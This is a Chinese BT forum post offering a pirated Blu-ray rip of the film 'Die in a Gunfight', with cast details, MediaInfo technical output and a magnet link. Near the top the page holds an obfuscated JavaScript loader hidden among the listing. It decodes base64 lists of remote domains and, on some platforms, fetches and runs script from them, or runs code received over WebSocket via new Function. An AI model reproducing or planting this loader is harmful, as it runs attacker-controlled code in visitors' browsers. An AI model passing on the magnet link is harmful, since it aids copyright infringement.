死于枪战[中文字幕]Die.in.a.Gunfight.2021.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-迅雷下载 5.87GB

版主小s 7天前 214

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 死于枪战 / 枪战之死
◎片  名 Die in a Gunfight
◎年  代 2021
◎产  地 美国
◎类  别 喜剧 / 动作 / 爱情 / 犯罪
◎语  言 英语
◎上映日期 2021-07-01(俄罗斯)
◎IMDb链接 https://www.imdb.com/title/tt1697800/
◎豆瓣链接 https://movie.douban.com/subject/6872950/
◎导  演 科林·希夫利 Collin Schiffli (id:1437693)
◎编  剧 安德鲁·贝伦 Andrew Barrer (id:1396835)
       加百利·法拉利 Gabriel Ferrari (id:1375927)
◎演  员 迪耶戈·博内塔 Diego Boneta (id:1182889)
       亚历珊德拉·达达里奥 Alexandra Daddario (id:1031854)
       崔维斯·费米尔 Travis Fimmel (id:1009451)
       贾斯汀·查特文 Justin Chatwin (id:1040530)
       比利·克鲁德普 Billy Crudup (id:1009265)
       埃曼纽尔·施莱琪 Emmanuelle Chriqui (id:1036312)
       尼古拉·科雷亚·达姆得 Nicola Correia Damude (id:1325888)
       约翰·拉尔斯顿 John Ralston (id:1145096)
       米歇尔·诺尔顿 Michelle Nolden (id:1293249)
       斯图尔特·休斯 Stuart Hughes (id:1380983)
       约翰·腾奇 John Tench (id:1441055)
       蕾妮·威利特 Renée Willett (id:1379234)
       高莉莉 Lily Gao (id:1383559)
       奥立薇娅·玛恩 Olivia Munn (id:1009303)
       海伦·亨特 Helen Hunt (id:1019017)
       大卫·达斯马齐连 David Dastmalchian (id:1337583)

◎标  签 亚历珊德拉·达达里奥 / 动作 / 2021 / 美国 / 剧情 / 电影 / 爱情 / Olivia

◎简  介
  故事围绕一位年轻人(博内塔饰)爱上了自己父亲死敌的女儿(达达里奥饰)展开。

  1. General
  2. Unique ID                                : 137592099574359975463803860527146824306 (0x678346438B38434EC602B87E49C77272)
  3. Complete name                            : Di[email protected]BBQDDQ.COM.mkv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 5.86 GiB
  7. Duration                                 : 1 h 32 min
  8. Overall bit rate mode                    : Variable
  9. Overall bit rate                         : 9 099 kb/s
  10. Encoded date                             : UTC 2021-07-17 12:08:54
  11. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit
  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1
  13. Video
  14. ID                                       : 1
  15. Format                                   : HEVC
  16. Format/Info                              : High Efficiency Video Coding
  17. Format profile                           : Main [email protected]@High
  18. Codec ID                                 : V_MPEGH/ISO/HEVC
  19. Duration                                 : 1 h 32 min
  20. Bit rate                                 : 5 555 kb/s
  21. Width                                    : 1 920 pixels
  22. Height                                   : 802 pixels
  23. Display aspect ratio                     : 2.40:1
  24. Frame rate mode                          : Constant
  25. Frame rate                               : 23.976 (24000/1001/53354) FPS
  26. Color space                              : YUV
  27. Chroma subsampling                       : 4:2:0
  28. Bit depth                                : 10 bits
  29. Bits/(Pixel*Frame)                       : 0.150
  30. Stream size                              : 3.58 GiB (61%)
  31. Title                                    : HEVC, [email protected]@High, 24/1.001 fps @ 5555 kbps
  32. Writing library                          : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit
  33. Encoding settings                        : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x802 / interlace=0 / total-frames=132745 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0
  34. Language                                 : English
  35. Default                                  : Yes
  36. Forced                                   : No
  37. Color range                              : Limited
  38. Color primaries                          : BT.709
  39. Transfer characteristics                 : BT.709
  40. Matrix coefficients                      : BT.709
  41. Audio #1
  42. ID                                       : 2
  43. Format                                   : DTS XLL
  44. Format/Info                              : Digital Theater Systems
  45. Commercial name                          : DTS-HD Master Audio
  46. Codec ID                                 : A_DTS
  47. Duration                                 : 1 h 32 min
  48. Bit rate mode                            : Variable
  49. Bit rate                                 : 3 310 kb/s
  50. Channel(s)                               : 6 channels
  51. Channel layout                           : C L R Ls Rs LFE
  52. Sampling rate                            : 48.0 kHz
  53. Frame rate                               : 93.750 FPS (512 SPF)
  54. Bit depth                                : 24 bits
  55. Compression mode                         : Lossless
  56. Stream size                              : 2.13 GiB (36%)
  57. Title                                    : English DTS-HD Master Audio 5.1 @ 3310 kbps
  58. Language                                 : English
  59. Default                                  : Yes
  60. Forced                                   : No
  61. Audio #2
  62. ID                                       : 3
  63. Format                                   : AC-3
  64. Format/Info                              : Audio Coding 3
  65. Commercial name                          : Dolby Digital
  66. Codec ID                                 : A_AC3
  67. Duration                                 : 1 h 32 min
  68. Bit rate mode                            : Constant
  69. Bit rate                                 : 192 kb/s
  70. Channel(s)                               : 2 channels
  71. Channel layout                           : L R
  72. Sampling rate                            : 48.0 kHz
  73. Frame rate                               : 31.250 FPS (1536 SPF)
  74. Compression mode                         : Lossy
  75. Stream size                              : 127 MiB (2%)
  76. Title                                    : English Dolby Digital Audio 2.0 @ 192 kbps  Commentary
  77. Language                                 : English
  78. Service kind                             : Complete Main
  79. Default                                  : No
  80. Forced                                   : No
  81. Text
  82. ID                                       : 4
  83. Format                                   : PGS
  84. Codec ID                                 : S_HDMV/PGS
  85. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  86. Duration                                 : 1 h 28 min
  87. Bit rate                                 : 39.4 kb/s
  88. Count of elements                        : 2558
  89. Stream size                              : 25.0 MiB (0%)
  90. Title                                    : Eng/SUP
  91. Language                                 : English
  92. Default                                  : Yes
  93. Forced                                   : No
  94. Menu
  95. 00:00:00.000                             : en:第 01 章
  96. 00:03:25.664                             : en:第 02 章
  97. 00:13:18.631                             : en:第 03 章
  98. 00:16:12.638                             : en:第 04 章
  99. 00:24:09.281                             : en:第 05 章
  100. 00:28:33.170                             : en:第 06 章
  101. 00:35:19.993                             : en:第 07 章
  102. 00:38:37.899                             : en:第 08 章
  103. 00:44:13.109                             : en:第 09 章
  104. 00:47:35.186                             : en:第 10 章
  105. 00:55:41.463                             : en:第 11 章
  106. 00:58:39.725                             : en:第 12 章
  107. 01:02:52.477                             : en:第 13 章
  108. 01:08:55.798                             : en:第 14 章
  109. 01:13:28.362                             : en:第 15 章
  110. 01:22:39.163                             : en:第 16 章


TAGS 动作 犯罪 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:608DFE9A96897801027A813E4A8BE2C129E3667C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回